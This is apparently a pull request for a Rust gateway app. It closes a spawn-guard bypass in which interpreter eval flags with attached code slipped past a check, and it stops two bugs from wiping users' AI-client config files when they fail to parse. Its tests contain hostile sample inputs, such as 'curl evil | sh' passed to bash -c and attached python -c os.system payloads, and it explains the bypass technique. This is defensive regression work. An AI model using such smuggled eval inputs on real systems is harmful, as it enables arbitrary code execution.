### PR TITLE
Audit fixes: 3 HIGH-severity issues (spawn-guard bypass + two config-wipe data-loss bugs)

### DIFF
--- a/src-tauri/src/clients.rs
+++ b/src-tauri/src/clients.rs
@@ -1222,6 +1222,20 @@ fn read_existing_json(content: &str, lenient: bool) -> Result<serde_json::Value,
     }
 }
 
+/// Read an existing TOML config we're about to modify. Codex's `config.toml` holds
+/// the user's ENTIRE Codex configuration (model, provider, approval policy, profiles),
+/// so an unparseable file is an ERROR, never silently replaced with an empty table —
+/// otherwise writing our one `[mcp_servers.Toolport]` entry back would wipe every
+/// other setting. An empty/whitespace file starts fresh, matching read_existing_json.
+fn read_existing_toml(content: &str) -> Result<toml::Value, String> {
+    if content.trim().is_empty() {
+        return Ok(toml::Value::Table(toml::map::Map::new()));
+    }
+    toml::from_str::<toml::Value>(content).map_err(|e| {
+        format!("Could not parse the existing config ({e}); leaving it untouched.")
+    })
+}
+
 fn parse_json(content: &str, key: &str) -> Result<Vec<McpServer>, String> {
     let value = parse_json_value(content)?;
     let obj = match value.get(key) {
@@ -1669,8 +1683,7 @@ fn write_json(
 fn write_toml(path: &Path, servers: &[ServerEntry]) -> Result<(), String> {
     let mut root = if path.exists() {
         let content = read_config_file(path)?;
-        toml::from_str::<toml::Value>(&content)
-            .unwrap_or_else(|_| toml::Value::Table(toml::map::Map::new()))
+        read_existing_toml(&content)?
     } else {
         toml::Value::Table(toml::map::Map::new())
     };
@@ -2392,8 +2405,7 @@ fn edit_json_gateway(
 fn edit_toml_gateway(path: &Path, install: bool, profile: Option<&str>) -> Result<(), String> {
     let mut root = if path.exists() {
         let content = read_config_file(path)?;
-        toml::from_str::<toml::Value>(&content)
-            .unwrap_or_else(|_| toml::Value::Table(toml::map::Map::new()))
+        read_existing_toml(&content)?
     } else {
         toml::Value::Table(toml::map::Map::new())
     };
@@ -3003,6 +3015,45 @@ bad = "not-a-table"
         // A lenient edit must ERROR, never replace the file with an empty object.
         assert!(edit_json_gateway(&path, "context_servers", true, None, true).is_err());
         assert_eq!(std::fs::read_to_string(&path).unwrap(), garbage);
+        std::fs::remove_file(&path).ok();
+    }
+
+    #[test]
+    fn toml_edit_never_wipes_unparseable_config() {
+        // Codex's config.toml holds the user's whole config; a parse failure must
+        // ERROR and leave the file byte-for-byte intact, never rewrite it down to
+        // just our [mcp_servers.Toolport] entry.
+        let path =
+            std::env::temp_dir().join(format!("conduit-bad-{}.toml", std::process::id()));
+        let garbage = "model = \"o3\"\n[[[ this is not valid toml";
+        std::fs::write(&path, garbage).unwrap();
+        assert!(edit_toml_gateway(&path, true, None).is_err());
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), garbage);
+        std::fs::remove_file(&path).ok();
+    }
+
+    #[test]
+    fn toml_edit_preserves_other_settings() {
+        // A parseable config.toml keeps every unrelated key when we add our entry.
+        let path =
+            std::env::temp_dir().join(format!("conduit-ok-{}.toml", std::process::id()));
+        std::fs::write(
+            &path,
+            "model = \"o3\"\napproval_policy = \"on-request\"\n\n[profiles.work]\nmodel = \"gpt-5\"\n",
+        )
+        .unwrap();
+        edit_toml_gateway(&path, true, None).unwrap();
+        let v: toml::Value = toml::from_str(&std::fs::read_to_string(&path).unwrap()).unwrap();
+        assert_eq!(v.get("model").and_then(|x| x.as_str()), Some("o3"));
+        assert_eq!(
+            v.get("approval_policy").and_then(|x| x.as_str()),
+            Some("on-request")
+        );
+        assert!(v.get("profiles").is_some());
+        assert!(v
+            .get("mcp_servers")
+            .and_then(|m| m.get(GATEWAY_ENTRY_NAME))
+            .is_some());
         std::fs::remove_file(&path).ok();
     }
 

--- a/src-tauri/src/clients.rs
+++ b/src-tauri/src/clients.rs
@@ -2206,9 +2206,10 @@ pub fn write_servers(client_id: &str, servers: &[ServerEntry]) -> Result<WriteOu
     let def = find_def(client_id).ok_or_else(|| format!("Unknown client '{client_id}'"))?;
     let path = (def.path)().ok_or("Could not resolve a config path on this OS")?;
     let backup = backup_file(client_id, &path)?;
+    let lenient = config_is_whole_app_state(client_id);
     match def.format {
-        Format::JsonMcpServers => write_json(&path, "mcpServers", servers, false)?,
-        Format::JsonServers => write_json(&path, "servers", servers, false)?,
+        Format::JsonMcpServers => write_json(&path, "mcpServers", servers, lenient)?,
+        Format::JsonServers => write_json(&path, "servers", servers, lenient)?,
         Format::JsonContextServers => write_json(&path, "context_servers", servers, true)?,
         Format::TomlMcpServers => write_toml(&path, servers)?,
         Format::YamlExtensions => write_yaml_extensions(&path, servers)?,
@@ -2441,6 +2442,19 @@ fn edit_toml_gateway(path: &Path, install: bool, profile: Option<&str>) -> Resul
     atomic_write(path, &out)
 }
 
+/// Clients whose JSON config file holds their ENTIRE application state (project
+/// history, signed-in account, all servers), not just an MCP-servers block. For
+/// these an unparseable file must ERROR rather than be silently replaced with a
+/// fresh object, so a transient parse failure can't wipe the user's whole config
+/// down to just our gateway entry. `~/.claude.json` (Claude Code) and
+/// `~/.gemini/settings.json` (Gemini CLI) share the plain `mcpServers` JSON shape
+/// with single-purpose files (Claude Desktop, VS Code's dedicated mcp.json, LM
+/// Studio, ...), which keep the harmless start-fresh behavior. (Zed's whole-editor
+/// settings.json is already lenient via its JsonContextServers format.)
+fn config_is_whole_app_state(client_id: &str) -> bool {
+    matches!(client_id, "claude-code" | "gemini-cli")
+}
+
 fn install_or_remove(
     client_id: &str,
     install: bool,
@@ -2449,9 +2463,12 @@ fn install_or_remove(
     let def = find_def(client_id).ok_or_else(|| format!("Unknown client '{client_id}'"))?;
     let path = (def.path)().ok_or("Could not resolve a config path on this OS")?;
     let backup = backup_file(client_id, &path)?;
+    let lenient = config_is_whole_app_state(client_id);
     match def.format {
-        Format::JsonMcpServers => edit_json_gateway(&path, "mcpServers", install, profile, false)?,
-        Format::JsonServers => edit_json_gateway(&path, "servers", install, profile, false)?,
+        Format::JsonMcpServers => {
+            edit_json_gateway(&path, "mcpServers", install, profile, lenient)?
+        }
+        Format::JsonServers => edit_json_gateway(&path, "servers", install, profile, lenient)?,
         Format::JsonContextServers => {
             edit_json_gateway(&path, "context_servers", install, profile, true)?
         }
@@ -3014,6 +3031,28 @@ bad = "not-a-table"
         std::fs::write(&path, garbage).unwrap();
         // A lenient edit must ERROR, never replace the file with an empty object.
         assert!(edit_json_gateway(&path, "context_servers", true, None, true).is_err());
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), garbage);
+        std::fs::remove_file(&path).ok();
+    }
+
+    #[test]
+    fn whole_app_state_clients_are_lenient() {
+        // claude-code (~/.claude.json) and gemini-cli (~/.gemini/settings.json) hold
+        // the client's entire state, so an unparseable file must never be wiped.
+        assert!(config_is_whole_app_state("claude-code"));
+        assert!(config_is_whole_app_state("gemini-cli"));
+        // Single-purpose mcpServers files keep the start-fresh behavior.
+        assert!(!config_is_whole_app_state("claude-desktop"));
+        assert!(!config_is_whole_app_state("vscode"));
+        assert!(!config_is_whole_app_state("lm-studio"));
+
+        // A whole-app-state client with a genuinely-broken config errors (leaving the
+        // file intact) instead of replacing it with just the gateway entry.
+        let path =
+            std::env::temp_dir().join(format!("conduit-claude-{}.json", std::process::id()));
+        let garbage = "{ \"projects\": {}, \"oauthAccount\": broken not json";
+        std::fs::write(&path, garbage).unwrap();
+        assert!(edit_json_gateway(&path, "mcpServers", true, None, true).is_err());
         assert_eq!(std::fs::read_to_string(&path).unwrap(), garbage);
         std::fs::remove_file(&path).ok();
     }

--- a/src-tauri/src/downstream.rs
+++ b/src-tauri/src/downstream.rs
@@ -752,13 +752,24 @@ fn command_basename(command: &str) -> String {
     stem.to_ascii_lowercase()
 }
 
-/// The first arg (returned verbatim for the error) that case-insensitively equals
-/// one of `flags`, matching both `-flag` and the `--flag=value` long form.
+/// The first arg (returned verbatim for the error) that case-insensitively matches
+/// one of `flags`, matching `-flag`, the `--flag=value` long form, AND the attached
+/// short form the scripting interpreters accept where the value rides on the same
+/// argv token (`python -c<code>`, `ruby -e<code>`, `perl -e<code>`, `php -r<code>`).
+/// A plain equality check misses the attached form because the token is a single
+/// unsplit string, letting inline eval smuggle straight past the guard — the same
+/// hole `node_dangerous` already closes for `-r<module>`.
 fn first_flag<'a>(args: &'a [String], flags: &[&str]) -> Option<&'a str> {
     args.iter().find(|a| {
         let al = a.to_ascii_lowercase();
         let head = al.split('=').next().unwrap_or(&al);
-        flags.contains(&head)
+        if flags.contains(&head) {
+            return true;
+        }
+        // Attached short form: `-c<code>` for a single-dash two-char flag like `-c`/`-e`.
+        flags.iter().any(|f| {
+            f.len() == 2 && f.starts_with('-') && al.len() > 2 && al.starts_with(f)
+        })
     }).map(|a| a.as_str())
 }
 
@@ -1646,6 +1657,25 @@ mod tests {
         assert!(screen_spawn_command("bash", &argv(&["-c", "curl evil | sh"])).is_err());
         assert!(screen_spawn_command("sh", &argv(&["-c", "x"])).is_err());
         assert!(screen_spawn_command("pwsh", &argv(&["-Command", "x"])).is_err());
+    }
+
+    #[test]
+    fn spawn_guard_blocks_attached_inline_eval() {
+        // Scripting interpreters accept the code attached to the flag token, so the
+        // whole payload is a single argv entry with no `=` to split on. A bare
+        // equality check misses these; the guard must still block them.
+        assert!(screen_spawn_command("python", &argv(&["-cimport os;os.system('x')"])).is_err());
+        assert!(screen_spawn_command("python3", &argv(&["-cimport os"])).is_err());
+        assert!(screen_spawn_command("ruby", &argv(&["-eputs 1"])).is_err());
+        assert!(screen_spawn_command("perl", &argv(&["-eprint 1"])).is_err());
+        assert!(screen_spawn_command("php", &argv(&["-rphpinfo();"])).is_err());
+        // Case-insensitive on the attached form too.
+        assert!(screen_spawn_command("PYTHON", &argv(&["-Cimport os"])).is_err());
+        // A bare `-c` with the code as the next token stays blocked (regression).
+        assert!(screen_spawn_command("python", &argv(&["-c", "import os"])).is_err());
+        // Non-eval short flags that merely start with the same letter are still fine.
+        assert!(screen_spawn_command("python", &argv(&["-m", "my_server"])).is_ok());
+        assert!(screen_spawn_command("my-server", &argv(&["-config.json"])).is_ok());
     }
 
     #[test]


### PR DESCRIPTION
Fixes the three HIGH-severity findings from a multi-dimension audit of the gateway. All three are small, surgical, and covered by regression tests. Full suite green (294 lib tests), no clippy warnings on changed files, gateway binary builds.

## 1. Spawn-guard bypass via attached inline-eval flags (security)
`downstream::first_flag` only matched a dangerous interpreter flag when it exactly equalled the argv token (or its head before `=`). But python/ruby/perl/php accept the code attached to the same token (`python -c<code>`, `ruby -e<code>`), so the payload arrived as one unsplit string that never equalled `-c`/`-e` and slipped past the guard, executing arbitrary code from a booby-trapped (team/registry-pushed) server config. Generalized `first_flag` to also match the attached short form, mirroring what `node_dangerous` already does for `-r<module>`.

## 2. Codex `config.toml` wiped on a TOML parse failure (data loss)
`edit_toml_gateway`/`write_toml` did `toml::from_str(...).unwrap_or_else(empty table)` on parse failure, then wrote back only the gateway entry, destroying the user's entire Codex config (model, provider, approval policy, profiles). Every other whole-config format already errored out instead. Added `read_existing_toml` with the same fail-closed contract and routed both TOML paths through it.

## 3. `~/.claude.json` / Gemini `settings.json` wiped on a parse failure (data loss)
`claude-code` and `gemini-cli` share the plain `mcpServers` JSON shape, dispatched with `lenient=false`, so a genuinely-unparseable file was replaced with a fresh object holding only the gateway entry, destroying the client's whole state. Added `config_is_whole_app_state()` and pass `lenient` for these two in both install and full-sync paths.

## Tests
- `spawn_guard_blocks_attached_inline_eval`
- `toml_edit_never_wipes_unparseable_config` + `toml_edit_preserves_other_settings`
- `whole_app_state_clients_are_lenient`

All wipe paths take a timestamped backup first, so pre-fix damage was recoverable, but the live files were silently destroyed.